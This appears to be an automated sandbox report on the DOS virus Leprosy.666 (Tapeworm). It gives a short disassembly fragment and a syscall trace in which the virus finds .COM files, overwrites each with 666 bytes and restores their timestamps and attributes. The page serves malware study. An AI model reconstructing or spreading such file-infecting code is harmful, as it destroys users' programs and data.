Sample viewer

vx.netlux.org/Virus.DOS.Leprosy.666.Tapeworm

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:24:34.68086149Z 44 PC: 12b9b | Get time 0x12b9b: cmp byte ptr [0x106], 0
0x12ba0: je 0x12ba7
0x12ba2: cmp dh, 0xf
0x12ba5: jg 0x12bb0
0x12ba7: cmp dl, 0
0x12baa: je 0x12b97
0x12bac: mov byte ptr [0x106], dl
0x12bb0: mov byte ptr [0x24c], 0
0x12bb5: mov byte ptr [0x24d], 4
0x12bba: mov byte ptr [0x256], 0
0x12bbf: mov cx, 0x27
0x12bc2: mov dx, 0x131
0x12bc5: mov ah, 0x4e
0x12bc7: int 0x21
0x12bc9: cmp ax, 0x12
0x12bcc: je 0x12bd1
0x12bce: call 0x12bf3
0x12bd1: mov cx, 0x27
0x12bd4: mov dx, 0x137
0x12bd7: mov ah, 0x4e
2018-12-17T22:24:34.683662018Z 78 PC: 12bc9 | Find first file
2018-12-17T22:24:34.689527187Z 78 PC: 12bdb | Find first file
2018-12-17T22:24:34.695580356Z 67 PC: 12c14 | Get or set file attributes
2018-12-17T22:24:34.713517862Z 61 PC: 12c1a | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:24:34.720074183Z 63 PC: 12c29 | Read file or device (Read 20 bytes on handle 5)
2018-12-17T22:24:34.726586416Z 62 PC: 12c5d | Close file
2018-12-17T22:24:34.729258092Z 61 PC: 12c66 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:24:34.741030774Z 64 PC: 12a5a | Write file or device (Write 666 bytes on handle 5)
2018-12-17T22:24:34.749195479Z 87 PC: 12c8e | Get or set file date and time
2018-12-17T22:24:34.751224344Z 62 PC: 12c96 | Close file
2018-12-17T22:24:34.758803548Z 67 PC: 12ca3 | Get or set file attributes
2018-12-17T22:24:34.763681313Z 79 PC: 12c4d | Find next file
2018-12-17T22:24:34.766830518Z 67 PC: 12c14 | Get or set file attributes
2018-12-17T22:24:34.776963552Z 61 PC: 12c1a | Open file (Filename = 'PRINT.COM')
2018-12-17T22:24:34.783456148Z 63 PC: 12c29 | Read file or device (Read 20 bytes on handle 5)
2018-12-17T22:24:34.789530656Z 62 PC: 12c5d | Close file
2018-12-17T22:24:34.791823022Z 61 PC: 12c66 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:24:34.804137788Z 64 PC: 12a5a | Write file or device (Write 666 bytes on handle 5)
2018-12-17T22:24:34.812477089Z 87 PC: 12c8e | Get or set file date and time
2018-12-17T22:24:34.814818579Z 62 PC: 12c96 | Close file
2018-12-17T22:24:34.822512757Z 67 PC: 12ca3 | Get or set file attributes
2018-12-17T22:24:34.827105209Z 79 PC: 12c4d | Find next file
2018-12-17T22:24:34.829494422Z 67 PC: 12c14 | Get or set file attributes
2018-12-17T22:24:34.835862571Z 61 PC: 12c1a | Open file (Filename = 'HELLO.COM')
2018-12-17T22:24:34.842456678Z 63 PC: 12c29 | Read file or device (Read 20 bytes on handle 5)
2018-12-17T22:24:34.849031619Z 62 PC: 12c5d | Close file
2018-12-17T22:24:34.850848646Z 61 PC: 12c66 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:24:34.862491978Z 64 PC: 12a5a | Write file or device (Write 666 bytes on handle 5)
2018-12-17T22:24:34.8722221Z 87 PC: 12c8e | Get or set file date and time
2018-12-17T22:24:34.873920437Z 62 PC: 12c96 | Close file
2018-12-17T22:24:34.881749993Z 67 PC: 12ca3 | Get or set file attributes
2018-12-17T22:24:34.887751368Z 79 PC: 12c4d | Find next file
2018-12-17T22:24:34.890295917Z 67 PC: 12c14 | Get or set file attributes
2018-12-17T22:24:34.899644779Z 61 PC: 12c1a | Open file (Filename = 'PHANG.COM')
2018-12-17T22:24:34.906841471Z 63 PC: 12c29 | Read file or device (Read 20 bytes on handle 5)
2018-12-17T22:24:34.913001968Z 62 PC: 12c5d | Close file
2018-12-17T22:24:34.914703683Z 61 PC: 12c66 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:24:34.927789833Z 64 PC: 12a5a | Write file or device (Write 666 bytes on handle 5)
2018-12-17T22:24:34.936424078Z 87 PC: 12c8e | Get or set file date and time
2018-12-17T22:24:34.938102734Z 62 PC: 12c96 | Close file
2018-12-17T22:24:34.94709213Z 67 PC: 12ca3 | Get or set file attributes
2018-12-17T22:24:34.951831938Z 9 PC: 12cd2 | Display string (String= ' ������ �������� ! Press Any Key ...')
2018-12-17T22:24:34.955883846Z 76 PC: 12cd6 | Terminate with return code (Return code = '36')